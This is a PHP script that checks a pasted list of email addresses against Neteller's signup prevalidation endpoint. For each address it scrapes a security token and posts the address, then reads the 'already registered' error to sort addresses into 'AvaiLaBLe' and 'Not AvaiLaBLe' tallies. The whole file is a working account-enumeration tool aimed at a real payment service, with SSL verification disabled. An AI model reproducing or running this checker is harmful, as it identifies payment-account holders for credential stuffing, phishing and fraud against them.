Enter Email list to check |
';
if(!isset($timer)){die();}
echo '
|
';
class cURL {
var $callback = false;
function setCallback($func_name) {
$this->callback = $func_name;
}
function doRequest($method, $urlCurl, $postCurl) {
global $cookie;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $urlCurl);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_REFERER, $urlCurl);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie);
curl_setopt($ch, CURLOPT_VERBOSE, 1);
if ($method == 'POST') {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postCurl);
}
$data = curl_exec($ch);
curl_close($ch);
if ($data) {
if ($this->callback) {
$callback = $this->callback;
$this->callback = false;
return call_user_func($callback, $data);
} else {
return $data;
}
} else {
return curl_error($ch);
}
@unlink($cookie);
}
function get($urlCurl) {
return $this->doRequest('GET', $urlCurl, 'NULL');
}
function post($urlCurl, $postCurl) {
return $this->doRequest('POST', $urlCurl, $postCurl);
}
}
//--------------------------------------------------++
if (!empty($emails)) {
$emails = explode("\r\n", $emails);
$yes = 0;
$not = 0;
$count = 1;
//-----------------------++
echo '
';
//-----------------------++
$NewClas = new cURL();
//-----------------------++
foreach( $emails AS $email){
if(filter_var($email , FILTER_VALIDATE_EMAIL)){
//-----------------------++
echo ' '.$count.' - Checking '.$email.' . . . ';
$count++;
//-----------------------++
$Url ='https://member.neteller.com/member/signUp?step=twosteps';
$A = $NewClas ->get($Url);
preg_match('!name="securityToken" value="(.*?)"!', $A, $securityToken);
//-----------------------++
$LoginUrl = 'https://member.neteller.com/member/prevalidate';
$LoginPost = 'securityToken='.$securityToken[1].'&emailAddress='.$email.'&emailAddressConfirm='.$email.'&countryCode=US&prov=IL¤cyCode=USD&firstName=&lastName=&address1=&address2=&address3=&city=&country=US&subdivision=&postcode=&gender=&dob_year=&dob_month=&dob_day=&primaryPhone=&primaryPhoneCountryCode=&alternatePhone=&alternatePhoneCountryCode=&LinkBackURL=&MerchantID=&tempCurrencyCode=';
$B = $NewClas ->post($LoginUrl,$LoginPost);
//-----------------------++
if(strpos($B, 'The email address you entered is already'))
{
echo 'Yes ';
$yes++;
$vaild_yes .=$email."\n";
}
else
{
echo 'No ';
$not++;
$vaild_no .=$email."\n";
}
}
}
//-----------------------++
echo' |
Not AvaiLaBLe ( '.$not.' ) | AvaiLaBLe ( '.$yes.' ) |
| |
';
}
echo'